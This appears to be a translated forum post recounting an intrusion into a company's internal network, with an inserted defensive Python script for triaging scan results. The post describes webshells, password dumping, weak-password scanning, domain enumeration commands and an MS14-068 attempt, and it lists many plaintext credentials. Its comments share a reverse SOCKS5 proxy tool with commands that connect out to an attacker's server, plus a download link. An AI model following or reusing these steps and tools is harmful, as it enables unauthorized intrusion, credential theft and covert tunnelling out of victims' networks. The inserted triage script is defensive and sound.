A Case Study of Internal Network Penetration


1. External entry point:

Target: vlun.com [redacted]

Starting from the m.vlun.com sub-site, I found an injection point


Wrote a webshell straight through the backup function


Then escalated privileges and dumped passwords, obtaining:

UserName: Administrator
password: vlun,123 [the earlier password was captured too]

UserName: Administrator
password: vlun,54a [notice that this password is tied to the IP!]


2. Internal network penetration:

2.1. The 10.135.106.0/24 segment

This host sits in this segment, and judging from the passwords captured earlier, the password is tied to the IP. That is, if the IP is 10.135.106.108, its credential would be administrator:vlun,108a.

So I added the password dictionary to the Phoenix scanner (凤凰扫描器) and started scanning;

Result:

Mysql:
10.135.106.25 mysql at 3306 has weaken password!!-------root:123456
10.135.106.86 mysql at 3306 has weaken password!!-------root:root

Ssh:
10.135.106.245 ssh at 22 has weaken password!!-------root:vlun,123

Smb:
10.135.106.75 smb at 445 has weaken password!!-------administrator:vlun,123
10.135.106.160 smb at 445 has weaken password!!-------administrator:vlun,123
10.135.106.54 smb at 445 has weaken password!!-------administrator:vlun,54a
10.135.106.41 smb at 445 has weaken password!!-------administrator:vlun,41a
10.135.106.180 smb at 445 has weaken password!!-------administrator:vlun,180a

I like SOCKS5 proxies, since they can be used conveniently with proxychains and proxifier.

I wanted to use hdtran to set up a SOCKS proxy, but it kept getting killed, so I wrote something with the same function in Python: ssock_win.exe sets up a SOCKS5 proxy and reverse-connects it out~


This segment is a workgroup environment, so I didn't play further and prepared to roam the other IP segments.


2.2. 10.135.7.0/24 and 10.135.8.0/24

Ran the scanner again:

Result:

Web:
10.135.7.113 tomcat service at 8080 has weaken password!!-------tomcat:tomcat
10.135.8.20 has iis_put vlun at 80
10.135.8.188 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

Took 10.135.7.113 and 10.135.8.188 through tomcat and deployed shells


Found that the 7 and 8 segments have a domain environment, but this host cannot connect to 3389 on 10.135.7.113; access restrictions must be in place.


Moving on to 10.135.8.20, which has the IIS PUT write vulnerability; wrote a shell~


Found that 3389 is open on 10.135.8.20

Escalated privileges and dumped passwords:

Administrator:Pa$$w0rd

Logged in over Remote Desktop


Saw an Xshell window full of active SSH connections


Got quite a few Linux SSH logins.

With the 10.135.8.20 box, our access is no longer restricted~

2.3. Failed to take the domain controller

10.135.6.0/24, 10.135.7.0/24, 10.135.8.0/24 and 10.135.12.0/24 are all in the domain environment. How to take the DC? Current ideas:

1. Keep scanning for weak passwords and dumping credentials, and see whether a DC password turns up

2. Test MS14-068 and see whether it succeeds

1. Continued scanning for passwords; result:

Mysql:
10.135.6.241 mysql at 3306 has weaken password!!-------root:vlun,123
10.135.6.240 mysql at 3306 has weaken password!!-------root:vlun,123
10.135.12.206 mysql at 3306 has weaken password!!-------root:1
10.135.12.112 mysql at 3306 has weaken password!!-------root:123456
10.135.12.163 mysql at 3306 has weaken password!!-------root:root
10.135.12.223 mysql at 3306 has weaken password!!-------root:root

mssql:
10.135.4.65 mssql at 1433 has weaken password!!-------sa:vlun
10.135.6.49 mssql at 1433 has weaken password!!-------sa:sa
10.135.6.9 mssql at 1433 has weaken password!!-------sa:vlun
10.135.6.166 mssql at 1433 has weaken password!!-------sa:vlun
10.135.6.146 mssql at 1433 has weaken password!!-------sa:123456
10.135.7.135 mssql at 1433 has weaken password!!-------sa:sa
10.135.12.86 mysql at 3306 has weaken password!!-------root:root
10.135.12.98 mssql at 1433 has weaken password!!-------sa:sa

The sa account on 10.135.7.135 runs as SYSTEM; added an administrator account and logged into 3389.

Dumped passwords and found a domain user's password. Unfortunately not a domain admin, but the privileges are substantial: it can log into 3389 on most of the machines in the 7 segment:

UserName: tiancongliu

password: %TGB5tgb

Quickly gathered some information on the domain environment:

Query the Domain Admins group:

net group "domain admins" /domain
组名 Domain Admins
注释 Designated administrators of the domain
成员
-------------------------------------------------------------------------------
Administrator ericzhang hongxiangli
...................
命令成功完成。

dsquery computer ----- find the DC

[Found that 10.135.8.110 is the DC]

Smb:
10.135.7.83 smb at 445 has weaken password!!-------administrator:Pa$$w0rd
10.135.7.201 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.119 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.176 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.180 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.210 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.139 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.135 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.211 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.29 smb at 445 has weaken password!!-------administrator:Vlun,123
10.135.7.23 smb at 445 has weaken password!!-------administrator:password
10.135.8.188 smb at 445 has weaken password!!-------administrator:Vlun
10.135.8.234 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.8.154 has ms_08_067 VULNERABLE
10.135.8.72 has ms_08_067 VULNERABLE
10.135.8.251 has ms_08_067 VULNERABLE

Dumped passwords on these servers.... and still didn't find the DC's password...... sad

[Tip: logging into machines one at a time to dump passwords is tedious; you can use Netsess.exe -h dcip to find which servers the DC has logged into. It failed when I tested it, but some experts have had success; see here:

https://blog.netspi.com/5-ways-to-find-systems-running-domain-admin-processes/]
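As an added example (not code from the post or from the 凤凰 scanner), here is a Python triage script from the defender's side: it parses result lines in the format the scanner prints above and surfaces the two things that let one foothold spread across a whole segment in this write-up, a credential reused on many hosts and a local-admin password derived from the host's last octet. The sample lines are copied from the post; the regexes are my assumption about the line format.

```python
import re
from collections import defaultdict

# Constructed sample copied from the post's scanner output; the regexes below are my assumed formats.
SCAN_OUTPUT = """\
10.135.106.75 smb at 445 has weaken password!!-------administrator:vlun,123
10.135.106.160 smb at 445 has weaken password!!-------administrator:vlun,123
10.135.106.54 smb at 445 has weaken password!!-------administrator:vlun,54a
10.135.106.41 smb at 445 has weaken password!!-------administrator:vlun,41a
10.135.7.201 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.7.119 smb at 445 has weaken password!!-------administrator:Nji9bhu8
10.135.106.57 redis service at 6379 allow login Anonymous login!!
"""
WEAK = re.compile(r"^(\S+) (\w+)(?: service)? at (\d+) has weaken password!!-+(\S+?):(\S*)$")
ANON = re.compile(r"^(\S+) (\w+) service at (\d+) allow login Anonymous login!!$")

def parse(text):
    """Turn scanner lines into finding dicts; unrecognised lines are kept as 'other'."""
    findings = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if m := WEAK.match(line):
            host, svc, port, user, pw = m.groups()
            findings.append({"host": host, "service": svc, "port": int(port),
                             "kind": "weak_password", "user": user, "password": pw})
        elif m := ANON.match(line):
            host, svc, port = m.groups()
            findings.append({"host": host, "service": svc, "port": int(port),
                             "kind": "anonymous", "user": None, "password": None})
        else:
            findings.append({"host": line.split()[0], "kind": "other", "raw": line})
    return findings

def host_derived(host, password):
    """True when the host's last octet appears as a whole number in the password."""
    octet = host.rsplit(".", 1)[-1]          # e.g. 10.135.106.54 -> "54" in "vlun,54a"
    return re.search(rf"(?<!\d){octet}(?!\d)", password) is not None

def triage(findings):
    """Return (credentials seen on more than one host, hosts whose password is IP-derived)."""
    by_cred = defaultdict(set)
    derived = []
    for f in findings:
        if f["kind"] != "weak_password":
            continue
        by_cred[(f["user"], f["password"])].add(f["host"])
        if host_derived(f["host"], f["password"]):
            derived.append(f["host"])
    reused = {cred: sorted(hosts) for cred, hosts in by_cred.items() if len(hosts) > 1}
    return reused, sorted(derived)
```

Both lists are the remediation order a blue team wants: a shared local-admin password and a predictable per-host password each turn one compromised host into every host in the segment.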

2. Testing MS14-068 failed

Tested the just-released MS14-068.

Imported the credential.

Checked whether the credential had been imported.

Failed......

Didn't get the DC; a bit sad.

2.4. Other

Also scanned the other segments in passing.

Result:


Mail server is at 192.168.100.116 [couldn't get any further]



Brilliant!!! Maybe the msf credential collector module could be used to collect hashes and tokens; with some luck you might also run into the DC


Confirmed to be an advertorial for the Phoenix scanner (凤凰扫描器)

But it really is powerful

Can you share ssock_win.exe? It can open a proxy and forward out under ordinary privileges, right?

usage: ssock_win.exe [-h] --lport LPORT --rhost RHOST --rport RPORT

just like ssock

optional arguments:
-h, --help show this help message and exit
--lport LPORT build socket5 in this port
--rhost RHOST connect this ip
--rport RPORT connect this port

--lport is the local port on which the SOCKS5 service is opened
--rhost is the address of the server with a public IP
--rport is the port on that public server

The external server can receive with lcx -listen port1 port2, or listen with rtcp.py; they are the same.

Example:

External server:
lcx -listen port1 port2

Internal server:
ssock_win.exe --lport 10100 --rhost IP --rport port1

Files here:

链接:http://pan.baidu.com/s/1qWLqC24 密码:jyur

1. Paths containing Chinese characters will cause errors
2. Since it is built with pyinstaller, the files are rather large
3. ssock_win.exe can't send packets too frequently, but 3389 still connects fine~ after an error, run it again

Network privileges plus the ability to execute commands are enough.

via https://forum.90sec.org/forum.php?mod=viewthread&tid=8483